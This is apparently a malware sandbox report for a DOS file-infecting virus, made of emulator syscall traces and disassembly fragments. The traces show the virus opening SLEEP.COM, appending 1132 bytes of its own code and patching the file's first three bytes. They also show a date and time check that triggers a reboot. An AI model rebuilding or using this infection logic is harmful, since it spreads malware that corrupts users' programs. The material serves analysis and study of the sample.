Sample viewer

vx.netlux.org/Virus.DOS.Parasite.1132

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:24:08.874775702Z 47 PC: 12a85 | Get disk transfer address
2018-12-17T22:24:08.876058066Z 26 PC: 12a6a | Set disk transfer address
2018-12-17T22:24:08.877783673Z 42 PC: 12a94 | Get date 0x12a94: cmp al, 1
0x12a96: jge 0x12a9b
0x12a98: jmp 0x12aef
0x12a9a: nop
0x12a9b: cmp al, 1
0x12a9d: ja 0x12aef
0x12a9f: jmp 0x12b50
0x12aa2: mov ah, 2
0x12aa4: mov dl, 0x50
0x12aa6: int 0x21
0x12aa8: mov dl, 0x61
0x12aaa: int 0x21
0x12aac: mov dl, 0x72
0x12aae: int 0x21
0x12ab0: mov dl, 0x61
0x12ab2: int 0x21
0x12ab4: mov dl, 0x73
0x12ab6: int 0x21
0x12ab8: mov dl, 0x69
0x12aba: int 0x21
2018-12-17T22:24:08.880950582Z 2 PC: 12aa8 | Character output (Char = '50')
2018-12-17T22:24:08.884546943Z 2 PC: 12aac | Character output (Char = '61')
2018-12-17T22:24:08.888009503Z 2 PC: 12ab0 | Character output (Char = '72')
2018-12-17T22:24:08.890836231Z 2 PC: 12ab4 | Character output (Char = '61')
2018-12-17T22:24:08.893597045Z 2 PC: 12ab8 | Character output (Char = '73')
2018-12-17T22:24:08.896639335Z 2 PC: 12abc | Character output (Char = '69')
2018-12-17T22:24:08.899135142Z 2 PC: 12ac0 | Character output (Char = '74')
2018-12-17T22:24:08.901880824Z 2 PC: 12ac4 | Character output (Char = '65')
2018-12-17T22:24:08.905197174Z 2 PC: 12ac8 | Character output (Char = '20')
2018-12-17T22:24:08.907899929Z 2 PC: 12acc | Character output (Char = '56')
2018-12-17T22:24:08.910412675Z 2 PC: 12ad0 | Character output (Char = '69')
2018-12-17T22:24:08.912804866Z 2 PC: 12ad4 | Character output (Char = '72')
2018-12-17T22:24:08.915977648Z 2 PC: 12ad8 | Character output (Char = '75')
2018-12-17T22:24:08.918890741Z 2 PC: 12adc | Character output (Char = '73')
2018-12-17T22:24:08.921823896Z 2 PC: 12ae0 | Character output (Char = '21')
2018-12-17T22:24:08.925172127Z 2 PC: 12ae4 | Character output (Char = '20')
2018-12-17T22:24:08.92812669Z 2 PC: 12ae8 | Character output (Char = '62')
2018-12-17T22:24:08.931040953Z 2 PC: 12aec | Character output (Char = '79')
2018-12-17T22:24:08.934753683Z 2 PC: 12af6 | Character output (Char = '20')
2018-12-17T22:24:08.9374307Z 2 PC: 12afa | Character output (Char = '52')
2018-12-17T22:24:08.940052995Z 2 PC: 12afe | Character output (Char = '6f')
2018-12-17T22:24:08.943381008Z 2 PC: 12b02 | Character output (Char = '63')
2018-12-17T22:24:08.9458242Z 2 PC: 12b06 | Character output (Char = '6b')
2018-12-17T22:24:08.948571896Z 2 PC: 12b0a | Character output (Char = '20')
2018-12-17T22:24:08.952426522Z 2 PC: 12b0e | Character output (Char = '53')
2018-12-17T22:24:08.954929204Z 2 PC: 12b12 | Character output (Char = '74')
2018-12-17T22:24:08.957189072Z 2 PC: 12b16 | Character output (Char = '65')
2018-12-17T22:24:08.960103673Z 2 PC: 12b1a | Character output (Char = '61')
2018-12-17T22:24:08.962631454Z 2 PC: 12b1e | Character output (Char = '64')
2018-12-17T22:24:08.965948662Z 2 PC: 12b22 | Character output (Char = '79')
2018-12-17T22:24:08.968593059Z 2 PC: 12b26 | Character output (Char = '20')
2018-12-17T22:24:08.971435808Z 2 PC: 12b2a | Character output (Char = '5b')
2018-12-17T22:24:08.97366631Z 2 PC: 12b2e | Character output (Char = '4e')
2018-12-17T22:24:08.976245069Z 2 PC: 12b32 | Character output (Char = '75')
2018-12-17T22:24:08.978887221Z 2 PC: 12b36 | Character output (Char = '6b')
2018-12-17T22:24:08.981138964Z 2 PC: 12b3a | Character output (Char = '45')
2018-12-17T22:24:08.983402246Z 2 PC: 12b3e | Character output (Char = '5d')
2018-12-17T22:24:08.986506135Z 2 PC: 12b42 | Character output (Char = '20')
2018-12-17T22:24:08.989012956Z 2 PC: 12b46 | Character output (Char = '48')
2018-12-17T22:24:08.991527831Z 2 PC: 12b4a | Character output (Char = '50')
2018-12-17T22:24:08.995247924Z 78 PC: 12c2e | Find first file
2018-12-17T22:24:09.001911359Z 67 PC: 12c6c | Get or set file attributes
2018-12-17T22:24:09.008056358Z 67 PC: 12c7e | Get or set file attributes
2018-12-17T22:24:09.028020726Z 61 PC: 12c89 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:24:09.03554932Z 87 PC: 12c95 | Get or set file date and time
2018-12-17T22:24:09.037321188Z 44 PC: 12ca1 | Get time 0x12ca1: and dh, 7
0x12ca4: jmp 0x12ca7
0x12ca6: nop
0x12ca7: mov ah, 0x3f
0x12ca9: mov cx, 3
0x12cac: mov dx, 0xed
0x12caf: nop
0x12cb0: add dx, si
0x12cb2: int 0x21
0x12cb4: jb 0x12d0b
0x12cb6: cmp ax, 3
0x12cb9: jne 0x12d0b
0x12cbb: mov ax, 0x4202
0x12cbe: mov cx, 0
0x12cc1: mov dx, 0
0x12cc4: int 0x21
0x12cc6: jb 0x12d0b
0x12cc8: mov cx, ax
0x12cca: sub ax, 3
0x12ccd: mov word ptr [si + 0xf1], ax
2018-12-17T22:24:09.040516703Z 63 PC: 12cb4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:24:09.048289957Z 66 PC: 12cc6 | Move file pointer
2018-12-17T22:24:09.049985806Z 64 PC: 12cea | Write file or device (Write 1132 bytes on handle 5)
2018-12-17T22:24:09.060847758Z 66 PC: 12cfc | Move file pointer
2018-12-17T22:24:09.06276368Z 64 PC: 12d0b | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:24:09.070347916Z 87 PC: 12d1e | Get or set file date and time
2018-12-17T22:24:09.073081519Z 62 PC: 12d22 | Close file
2018-12-17T22:24:09.082387751Z 67 PC: 12d31 | Get or set file attributes
2018-12-17T22:24:09.093628156Z 26 PC: 12d3e | Set disk transfer address

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4237,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:21.584649573Z 47 PC: 12a85 | Get disk transfer address
2018-12-25T11:51:21.585774891Z 26 PC: 12a6a | Set disk transfer address
2018-12-25T11:51:21.587534032Z 42 PC: 12a94 | Get date 0x12a94: cmp al, 1
0x12a96: jge 0x12a9b
0x12a98: jmp 0x12aef
0x12a9a: nop
0x12a9b: cmp al, 1
0x12a9d: ja 0x12aef
0x12a9f: jmp 0x12b50
0x12aa2: mov ah, 2
0x12aa4: mov dl, 0x50
0x12aa6: int 0x21
0x12aa8: mov dl, 0x61
0x12aaa: int 0x21
0x12aac: mov dl, 0x72
0x12aae: int 0x21
0x12ab0: mov dl, 0x61
0x12ab2: int 0x21
0x12ab4: mov dl, 0x73
0x12ab6: int 0x21
0x12ab8: mov dl, 0x69
0x12aba: int 0x21
2018-12-25T11:51:21.590257672Z 2 PC: 12aa8 | Character output (Char = '50')
2018-12-25T11:51:21.592480579Z 2 PC: 12aac | Character output (Char = '61')
2018-12-25T11:51:21.595217087Z 2 PC: 12ab0 | Character output (Char = '72')
2018-12-25T11:51:21.597486214Z 2 PC: 12ab4 | Character output (Char = '61')
2018-12-25T11:51:21.599731012Z 2 PC: 12ab8 | Character output (Char = '73')
2018-12-25T11:51:21.602554894Z 2 PC: 12abc | Character output (Char = '69')
2018-12-25T11:51:21.604905093Z 2 PC: 12ac0 | Character output (Char = '74')
2018-12-25T11:51:21.60710234Z 2 PC: 12ac4 | Character output (Char = '65')
2018-12-25T11:51:21.610014793Z 2 PC: 12ac8 | Character output (Char = '20')
2018-12-25T11:51:21.612217063Z 2 PC: 12acc | Character output (Char = '56')
2018-12-25T11:51:21.61439832Z 2 PC: 12ad0 | Character output (Char = '69')
2018-12-25T11:51:21.616763618Z 2 PC: 12ad4 | Character output (Char = '72')
2018-12-25T11:51:21.619405175Z 2 PC: 12ad8 | Character output (Char = '75')
2018-12-25T11:51:21.621673525Z 2 PC: 12adc | Character output (Char = '73')
2018-12-25T11:51:21.623814862Z 2 PC: 12ae0 | Character output (Char = '21')
2018-12-25T11:51:21.626203093Z 2 PC: 12ae4 | Character output (Char = '20')
2018-12-25T11:51:21.628344219Z 2 PC: 12ae8 | Character output (Char = '62')
2018-12-25T11:51:21.630491329Z 2 PC: 12aec | Character output (Char = '79')
2018-12-25T11:51:21.63354063Z 2 PC: 12af6 | Character output (Char = '20')
2018-12-25T11:51:21.63676654Z 2 PC: 12afa | Character output (Char = '52')
2018-12-25T11:51:21.638914913Z 2 PC: 12afe | Character output (Char = '6f')
2018-12-25T11:51:21.641600618Z 2 PC: 12b02 | Character output (Char = '63')
2018-12-25T11:51:21.64399828Z 2 PC: 12b06 | Character output (Char = '6b')
2018-12-25T11:51:21.646356628Z 2 PC: 12b0a | Character output (Char = '20')
2018-12-25T11:51:21.649382459Z 2 PC: 12b0e | Character output (Char = '53')
2018-12-25T11:51:21.651763231Z 2 PC: 12b12 | Character output (Char = '74')
2018-12-25T11:51:21.655299147Z 2 PC: 12b16 | Character output (Char = '65')
2018-12-25T11:51:21.658266846Z 2 PC: 12b1a | Character output (Char = '61')
2018-12-25T11:51:21.660608688Z 2 PC: 12b1e | Character output (Char = '64')
2018-12-25T11:51:21.662976761Z 2 PC: 12b22 | Character output (Char = '79')
2018-12-25T11:51:21.665420839Z 2 PC: 12b26 | Character output (Char = '20')
2018-12-25T11:51:21.668038608Z 2 PC: 12b2a | Character output (Char = '5b')
2018-12-25T11:51:21.670329966Z 2 PC: 12b2e | Character output (Char = '4e')
2018-12-25T11:51:21.672754358Z 2 PC: 12b32 | Character output (Char = '75')
2018-12-25T11:51:21.675117194Z 2 PC: 12b36 | Character output (Char = '6b')
2018-12-25T11:51:21.677326293Z 2 PC: 12b3a | Character output (Char = '45')
2018-12-25T11:51:21.68098142Z 2 PC: 12b3e | Character output (Char = '5d')
2018-12-25T11:51:21.683691507Z 2 PC: 12b42 | Character output (Char = '20')
2018-12-25T11:51:21.685927433Z 2 PC: 12b46 | Character output (Char = '48')
2018-12-25T11:51:21.68829734Z 2 PC: 12b4a | Character output (Char = '50')
2018-12-25T11:51:21.691189476Z 78 PC: 12c2e | Find first file
2018-12-25T11:51:21.697994355Z 67 PC: 12c6c | Get or set file attributes
2018-12-25T11:51:21.713100341Z 67 PC: 12c7e | Get or set file attributes
2018-12-25T11:51:22.595109818Z 61 PC: 12c89 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:22.603512882Z 87 PC: 12c95 | Get or set file date and time
2018-12-25T11:51:22.605499684Z 44 PC: 12ca1 | Get time 0x12ca1: and dh, 7
0x12ca4: jmp 0x12ca7
0x12ca6: nop
0x12ca7: mov ah, 0x3f
0x12ca9: mov cx, 3
0x12cac: mov dx, 0xed
0x12caf: nop
0x12cb0: add dx, si
0x12cb2: int 0x21
0x12cb4: jb 0x12d0b
0x12cb6: cmp ax, 3
0x12cb9: jne 0x12d0b
0x12cbb: mov ax, 0x4202
0x12cbe: mov cx, 0
0x12cc1: mov dx, 0
0x12cc4: int 0x21
0x12cc6: jb 0x12d0b
0x12cc8: mov cx, ax
0x12cca: sub ax, 3
0x12ccd: mov word ptr [si + 0xf1], ax
2018-12-25T11:51:22.608391818Z 63 PC: 12cb4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:22.61682952Z 66 PC: 12cc6 | Move file pointer
2018-12-25T11:51:22.618644339Z 64 PC: 12cea | Write file or device (Write 1132 bytes on handle 5)
2018-12-25T11:51:22.629843642Z 66 PC: 12cfc | Move file pointer
2018-12-25T11:51:22.633057438Z 64 PC: 12d0b | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:22.641067965Z 87 PC: 12d1e | Get or set file date and time
2018-12-25T11:51:22.642795717Z 62 PC: 12d22 | Close file
2018-12-25T11:51:22.65038868Z 67 PC: 12d31 | Get or set file attributes
2018-12-25T11:51:22.658234134Z 26 PC: 12d3e | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4237,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:21.613962659Z 47 PC: 12a85 | Get disk transfer address
2018-12-25T11:51:21.615590736Z 26 PC: 12a6a | Set disk transfer address
2018-12-25T11:51:21.616705382Z 42 PC: 12a94 | Get date 0x12a94: cmp al, 1
0x12a96: jge 0x12a9b
0x12a98: jmp 0x12aef
0x12a9a: nop
0x12a9b: cmp al, 1
0x12a9d: ja 0x12aef
0x12a9f: jmp 0x12b50
0x12aa2: mov ah, 2
0x12aa4: mov dl, 0x50
0x12aa6: int 0x21
0x12aa8: mov dl, 0x61
0x12aaa: int 0x21
0x12aac: mov dl, 0x72
0x12aae: int 0x21
0x12ab0: mov dl, 0x61
0x12ab2: int 0x21
0x12ab4: mov dl, 0x73
0x12ab6: int 0x21
0x12ab8: mov dl, 0x69
0x12aba: int 0x21
2018-12-25T11:51:21.618761189Z 44 PC: 12b9c | Get time 0x12b9c: and dh, 0xf
0x12b9f: cmp dh, 3
0x12ba2: jb 0x12b5d
0x12ba4: cmp dh, 3
0x12ba7: ja 0x12bab
0x12ba9: int 0x19
0x12bab: pop si
0x12bac: push si
0x12bad: add si, 0xfd
0x12bb1: lodsb al, byte ptr [si]
0x12bb2: mov cx, 0x8000
0x12bb5: repne scasb al, byte ptr es:[di]
0x12bb7: mov cx, 4
0x12bba: lodsb al, byte ptr [si]
0x12bbb: scasb al, byte ptr es:[di]
0x12bbc: jne 0x12bab
0x12bbe: loop 0x12bba
0x12bc0: pop si
0x12bc1: pop es
0x12bc2: mov word ptr [si + 0xf9], di
2018-12-25T11:51:23.68250236Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:51:23.684049083Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:51:23.686052326Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T11:51:23.689306049Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:51:23.699469512Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:51:23.70095047Z 62 PC: 91fc1 | Close file
2018-12-25T11:51:23.703640536Z 75 PC: 91fe0 | Execute program
2018-12-25T11:51:23.718849094Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:51:23.720255988Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T11:51:23.729572948Z 48 PC: c609 | Get DOS version
2018-12-25T11:51:23.732566356Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:51:23.736930222Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:51:23.739256305Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:51:23.742837872Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T11:51:23.748326078Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T11:51:23.756599089Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:51:23.767060838Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:51:23.768459638Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:51:23.770459424Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:51:23.789981773Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:51:23.793404365Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T11:51:23.794549127Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:51:23.796038479Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:51:23.796987486Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.797973017Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.799447083Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:51:23.81960264Z 62 PC: 8f8eb | Close file
2018-12-25T11:51:23.821321816Z 62 PC: 8f8f2 | Close file
2018-12-25T11:51:23.824365377Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.835770015Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.837175673Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.838671596Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.840239437Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.841540733Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.843132791Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.844879076Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.846127134Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.84743325Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.848989121Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.850373251Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.851688139Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.853567014Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.854899323Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.856228432Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.857977243Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.85930999Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.860579623Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.862475423Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.863939Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.865216638Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.867054694Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.868342178Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.869604222Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.87130827Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.872571999Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.873774532Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.875634349Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.876862551Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:51:23.881335754Z 62 PC: 8f90e | Close file
2018-12-25T11:51:23.884048679Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:51:23.885987519Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:51:23.887924299Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:51:23.893578325Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:51:23.894825629Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:51:23.899289358Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:51:23.901236518Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:51:23.902342882Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:51:23.903878491Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:51:23.905277167Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:51:23.906686045Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:51:23.908191135Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:51:23.910066513Z 73 PC: 8fa11 | Release memory
2018-12-25T11:51:23.911468749Z 73 PC: 8efea | Release memory
2018-12-25T11:51:23.912665278Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:51:23.914509959Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:51:23.916124082Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:51:23.91754796Z 73 PC: 8f060 | Release memory
2018-12-25T11:51:23.919634066Z 61 PC: 8f080 | Open file (Filename = 'r,�S�������[�
2018-12-25T11:51:23.928123611Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:51:23.933322312Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:51:23.935083606Z 62 PC: 8f0d1 | Close file
2018-12-25T11:51:23.936669952Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:51:23.956188014Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:51:23.95732599Z 48 PC: 12bee | Get DOS version
2018-12-25T11:51:23.959405321Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:51:23.961517541Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:51:23.963165248Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:51:23.964265456Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:51:23.965518067Z 72 PC: 1355d | Allocate memory
2018-12-25T11:51:23.967432566Z 25 PC: 13596 | Get default drive
2018-12-25T11:51:23.968360448Z 71 PC: 135ad | Get current directory
2018-12-25T11:51:23.970501988Z 59 PC: 135ba | Change current directory
2018-12-25T11:51:23.975700473Z 59 PC: 135c8 | Change current directory
2018-12-25T11:51:23.979049754Z 59 PC: 135d3 | Change current directory
2018-12-25T11:51:23.981092372Z 25 PC: 12d13 | Get default drive
2018-12-25T11:51:23.98220227Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:51:23.983110918Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:51:23.983981938Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:23.985865067Z 80 PC: 1301d | Set current PSP
2018-12-25T11:51:23.986433934Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T11:51:23.987226541Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.98843354Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.989471197Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:51:23.991098353Z 72 PC: 130ec | Allocate memory
2018-12-25T11:51:23.99324724Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:51:23.999013252Z 62 PC: 131ba | Close file
2018-12-25T11:51:24.000856858Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:51:24.002144062Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:51:24.003330361Z 72 PC: 11991 | Allocate memory
2018-12-25T11:51:24.004684894Z 73 PC: 119b2 | Release memory
2018-12-25T11:51:24.006677295Z 72 PC: 119bd | Allocate memory
2018-12-25T11:51:24.008041745Z 73 PC: 119df | Release memory
2018-12-25T11:51:24.009083046Z 72 PC: 119f5 | Allocate memory
2018-12-25T11:51:24.018986308Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4237,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:21.618686782Z 47 PC: 12a85 | Get disk transfer address
2018-12-25T11:51:21.620113806Z 26 PC: 12a6a | Set disk transfer address
2018-12-25T11:51:21.621242578Z 42 PC: 12a94 | Get date 0x12a94: cmp al, 1
0x12a96: jge 0x12a9b
0x12a98: jmp 0x12aef
0x12a9a: nop
0x12a9b: cmp al, 1
0x12a9d: ja 0x12aef
0x12a9f: jmp 0x12b50
0x12aa2: mov ah, 2
0x12aa4: mov dl, 0x50
0x12aa6: int 0x21
0x12aa8: mov dl, 0x61
0x12aaa: int 0x21
0x12aac: mov dl, 0x72
0x12aae: int 0x21
0x12ab0: mov dl, 0x61
0x12ab2: int 0x21
0x12ab4: mov dl, 0x73
0x12ab6: int 0x21
0x12ab8: mov dl, 0x69
0x12aba: int 0x21
2018-12-25T11:51:21.623722101Z 44 PC: 12b9c | Get time 0x12b9c: and dh, 0xf
0x12b9f: cmp dh, 3
0x12ba2: jb 0x12b5d
0x12ba4: cmp dh, 3
0x12ba7: ja 0x12bab
0x12ba9: int 0x19
0x12bab: pop si
0x12bac: push si
0x12bad: add si, 0xfd
0x12bb1: lodsb al, byte ptr [si]
0x12bb2: mov cx, 0x8000
0x12bb5: repne scasb al, byte ptr es:[di]
0x12bb7: mov cx, 4
0x12bba: lodsb al, byte ptr [si]
0x12bbb: scasb al, byte ptr es:[di]
0x12bbc: jne 0x12bab
0x12bbe: loop 0x12bba
0x12bc0: pop si
0x12bc1: pop es
0x12bc2: mov word ptr [si + 0xf9], di
2018-12-25T11:51:23.664136171Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:51:23.665945592Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:51:23.668470543Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T11:51:23.67053368Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:51:23.678231678Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:51:23.679286143Z 62 PC: 91fc1 | Close file
2018-12-25T11:51:23.680872646Z 75 PC: 91fe0 | Execute program
2018-12-25T11:51:23.69253355Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:51:23.693851037Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T11:51:23.704408943Z 48 PC: c609 | Get DOS version
2018-12-25T11:51:23.70863055Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:51:23.713247715Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:51:23.715629225Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:51:23.719197431Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T11:51:23.726312258Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T11:51:23.736165688Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:51:23.746754716Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:51:23.748136001Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:51:23.750314635Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:51:23.772530879Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:51:23.776735958Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T11:51:23.778085677Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:51:23.779266586Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:51:23.780845059Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.782059319Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.783234834Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:51:23.795689097Z 62 PC: 8f8eb | Close file
2018-12-25T11:51:23.797518156Z 62 PC: 8f8f2 | Close file
2018-12-25T11:51:23.799404351Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.803232401Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.804836962Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.806319983Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.808745696Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.810528497Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.812184663Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.814033081Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.815706233Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.817209559Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.818658439Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.820349409Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.822003326Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.823722928Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.82603015Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.828030937Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.830032404Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.832117534Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.833295186Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.834419689Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.836212838Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.837413758Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.838582999Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.840230984Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.841941444Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.843270751Z 62 PC: 8f8f2 | Close file (See above)
